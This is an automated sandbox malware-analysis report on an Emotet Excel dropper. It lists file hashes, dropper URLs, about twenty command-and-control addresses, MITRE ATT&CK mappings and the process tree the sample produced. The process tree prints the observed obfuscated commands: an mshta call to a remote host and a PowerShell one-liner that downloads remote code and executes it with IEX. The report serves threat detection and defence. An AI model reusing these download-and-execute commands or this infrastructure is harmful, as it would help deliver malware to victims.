emotet | a9721d30134917f696b6d1d8f942692e56879f7039db33182225e3113762ff08

General

Target

a9721d30134917f696b6d1d8f942692e56879f7039db33182225e3113762ff08.xls
Size

61KB
MD5

5457d5f6e64422975d0b7c9da77c2a28
SHA1

0a4a707f02e784d2ddf64bc0d20986974dcd4903
SHA256

a9721d30134917f696b6d1d8f942692e56879f7039db33182225e3113762ff08
SHA512

c125cc75d390c1be518e5bb7cb875ddf8c89d8dd1135460d820a69c8fb39714d742f973925a203c077699e70c08d7830c61e204e48fde963c2c70379e328dfc1

Score

10^/10

emotet epoch4 banker trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://87.251.86.178/pp/oo.html

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://87.251.86.178/pp/PP.PNG

Extracted

Family

emotet

Botnet

Epoch4

C2

54.37.212.235:80

45.15.23.184:443

41.76.108.46:8080

212.237.5.209:443

46.55.222.11:443

207.38.84.195:8080

103.8.26.102:8080

138.185.72.26:8080

104.251.214.46:8080

110.232.117.186:8080

51.68.175.8:8080

176.104.106.96:8080

216.158.226.206:443

103.8.26.103:8080

103.75.201.2:443

210.57.217.132:8080

195.154.133.20:443

45.142.114.231:8080

107.182.225.142:8080

158.69.222.101:443

eck1.plain

ecs1.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	800	652	cmd.exe	68

Blocklisted process makes network request 6 IoCs

flow	pid	Process
29	3240	mshta.exe
35	2004	powershell.exe
37	2004	powershell.exe
44	2292	rundll32.exe
45	2292	rundll32.exe
46	2292	rundll32.exe

Downloads MZ/PE file

Loads dropped DLL 2 IoCs

pid	Process
616	rundll32.exe
1232	rundll32.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\Yqbxr\znjxajyda.uyi	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3472	3240	WerFault.exe	73

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
652	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
2004	powershell.exe
2004	powershell.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
3472	WerFault.exe
2004	powershell.exe
2292	rundll32.exe
2292	rundll32.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2004	powershell.exe
Token: SeDebugPrivilege	3472	WerFault.exe

Suspicious use of SetWindowsHookEx 13 IoCs

pid	Process
652	EXCEL.EXE
652	EXCEL.EXE
652	EXCEL.EXE
652	EXCEL.EXE
652	EXCEL.EXE
652	EXCEL.EXE
652	EXCEL.EXE
652	EXCEL.EXE
652	EXCEL.EXE
652	EXCEL.EXE
652	EXCEL.EXE
652	EXCEL.EXE
652	EXCEL.EXE

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 652 wrote to memory of 800	652	EXCEL.EXE	71
PID 652 wrote to memory of 800	652	EXCEL.EXE	71
PID 800 wrote to memory of 3240	800	cmd.exe	73
PID 800 wrote to memory of 3240	800	cmd.exe	73
PID 3240 wrote to memory of 2004	3240	mshta.exe	75
PID 3240 wrote to memory of 2004	3240	mshta.exe	75
PID 2004 wrote to memory of 408	2004	powershell.exe	78
PID 2004 wrote to memory of 408	2004	powershell.exe	78
PID 408 wrote to memory of 616	408	cmd.exe	79
PID 408 wrote to memory of 616	408	cmd.exe	79
PID 408 wrote to memory of 616	408	cmd.exe	79
PID 616 wrote to memory of 1232	616	rundll32.exe	80
PID 616 wrote to memory of 1232	616	rundll32.exe	80
PID 616 wrote to memory of 1232	616	rundll32.exe	80
PID 1232 wrote to memory of 844	1232	rundll32.exe	81
PID 1232 wrote to memory of 844	1232	rundll32.exe	81
PID 1232 wrote to memory of 844	1232	rundll32.exe	81
PID 844 wrote to memory of 2292	844	rundll32.exe	82
PID 844 wrote to memory of 2292	844	rundll32.exe	82
PID 844 wrote to memory of 2292	844	rundll32.exe	82

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\a9721d30134917f696b6d1d8f942692e56879f7039db33182225e3113762ff08.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:652
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/oo.html
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:800
- - C:\Windows\system32\mshta.exe
    mshta http://87.251.86.178/pp/oo.html
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory
    PID:3240
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2004
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,ssd
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:408
      - C:\Windows\SysWow64\rundll32.exe
        
        C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,ssd
        6⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:616
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
        7⤵
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious use of WriteProcessMemory
        
        PID:1232
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Yqbxr\znjxajyda.uyi",QoDlO
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:844
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Yqbxr\znjxajyda.uyi",DllRegisterServer
        9⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:2292
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 3240 -s 2040
      4⤵
      Program crash
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3472

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/616-325-0x0000000001050000-0x0000000001077000-memory.dmp

Filesize
156KB

Download
memory/652-122-0x00000160AFF80000-0x00000160AFF82000-memory.dmp

Filesize
8KB

Download
memory/652-116-0x00007FF989EC0000-0x00007FF989ED0000-memory.dmp

Filesize
64KB

Download
memory/652-128-0x00007FF9863F0000-0x00007FF986400000-memory.dmp

Filesize
64KB

Download
memory/652-129-0x00007FF9863F0000-0x00007FF986400000-memory.dmp

Filesize
64KB

Download
memory/652-115-0x00007FF989EC0000-0x00007FF989ED0000-memory.dmp

Filesize
64KB

Download
memory/652-117-0x00007FF989EC0000-0x00007FF989ED0000-memory.dmp

Filesize
64KB

Download
memory/652-118-0x00007FF989EC0000-0x00007FF989ED0000-memory.dmp

Filesize
64KB

Download
memory/652-119-0x00000160AFF80000-0x00000160AFF82000-memory.dmp

Filesize
8KB

Download
memory/652-120-0x00000160AFF80000-0x00000160AFF82000-memory.dmp

Filesize
8KB

Download
memory/652-121-0x00007FF989EC0000-0x00007FF989ED0000-memory.dmp

Filesize
64KB

Download
memory/844-329-0x0000000000750000-0x0000000000777000-memory.dmp

Filesize
156KB

Download
memory/1232-326-0x00000000047E0000-0x0000000004807000-memory.dmp

Filesize
156KB

Download
memory/2004-287-0x00000192F5F23000-0x00000192F5F25000-memory.dmp

Filesize
8KB

Download
memory/2004-277-0x00000192F6060000-0x00000192F6082000-memory.dmp

Filesize
136KB

Download
memory/2004-286-0x00000192F5F20000-0x00000192F5F22000-memory.dmp

Filesize
8KB

Download
memory/2004-298-0x00000192F6620000-0x00000192F665C000-memory.dmp

Filesize
240KB

Download
memory/2004-314-0x00000192F5F26000-0x00000192F5F28000-memory.dmp

Filesize
8KB

Download
memory/2004-309-0x00000192F66E0000-0x00000192F6756000-memory.dmp

Filesize
472KB

Download
memory/2292-330-0x0000000000700000-0x0000000000727000-memory.dmp

Filesize
156KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads